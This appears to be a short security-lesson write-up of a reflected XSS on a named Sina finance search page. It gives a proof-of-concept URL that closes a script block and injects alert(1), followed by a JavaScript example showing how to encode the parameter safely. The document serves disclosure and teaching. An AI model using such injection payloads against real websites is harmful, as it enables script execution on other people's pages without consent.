Lesson 2 http://www.bkjia.com/Article/201301/186364.html
Well, I found this one directly while I was looking for the first lesson. Anyway, the beginning is very simple: the value is output directly in the page source with no filtering, a reflected XSS.

Detailed description:

Vulnerability address: http://vip.stock.finance.sina.com.cn/q/go.php/vReport_List/kind/search/index.phtml?Symbol=002698&orgname=&industry=&title=&t1=all

Write a string of characters in the title parameter and view the source code. Taking 1111111111 as an example, we can see that it is output directly between JS script tags.

Add a tag that closes the preceding script block; the test passes, with no filtering:

http://vip.stock.finance.sina.com.cn/q/go.php/vReport_List/kind/search/index.phtml?Symbol=002698&orgname=&industry=&title=111111111%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E&t1=all

There are multiple sub-site pages; perform a full check.
Solution:
U know.
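One way to close this hole, as an added example that is not code from the report or from the affected site: encode the parameter for the JS-inside-HTML context before writing it into the script block. The `var title = "..."` template and all function names are assumptions made for illustration; the sample input is the title value from the test URL above.

```javascript
// Added example: embedding a request parameter inside an inline <script> block.
// renderUnsafe mirrors the behaviour the report describes; renderSafe is one fix.

// Characters that can end the script element or the string literal, mapped to
// \uXXXX escapes that the JS parser turns back into the original characters.
const ESCAPES = {
  '<': '\\u003C',
  '>': '\\u003E',
  '&': '\\u0026',
  "'": '\\u0027',
  '\u2028': '\\u2028',
  '\u2029': '\\u2029',
};

// Serialize a value as a JS string literal that is safe inside <script>...</script>.
function jsLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&'\u2028\u2029]/g, (c) => ESCAPES[c]);
}

// Vulnerable form (assumed template): the raw parameter is concatenated in.
function renderUnsafe(title) {
  return '<script>var title = "' + title + '";</script>';
}

// Hardened form: the parameter is encoded for the JS-in-HTML context.
function renderSafe(title) {
  return '<script>var title = ' + jsLiteral(title) + ';</script>';
}

// Count the script closing tags an HTML parser would see in the output.
function scriptBlocks(html) {
  return (html.match(/<\/script/gi) || []).length;
}

// Recover the value the JS engine would assign from the hardened output.
function decodeSafe(html) {
  const literal = html.slice('<script>var title = '.length, -';</script>'.length);
  return JSON.parse(literal);
}

// Constructed input: the decoded title value from the test URL above.
const sample = decodeURIComponent(
  '111111111%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E');

console.log('closing tags, unsafe:', scriptBlocks(renderUnsafe(sample)));
console.log('closing tags, safe:  ', scriptBlocks(renderSafe(sample)));
console.log('value preserved:     ', decodeSafe(renderSafe(sample)) === sample);
```

The hardened output contains a single closing script tag, the template's own, and the script still receives the exact string the user typed.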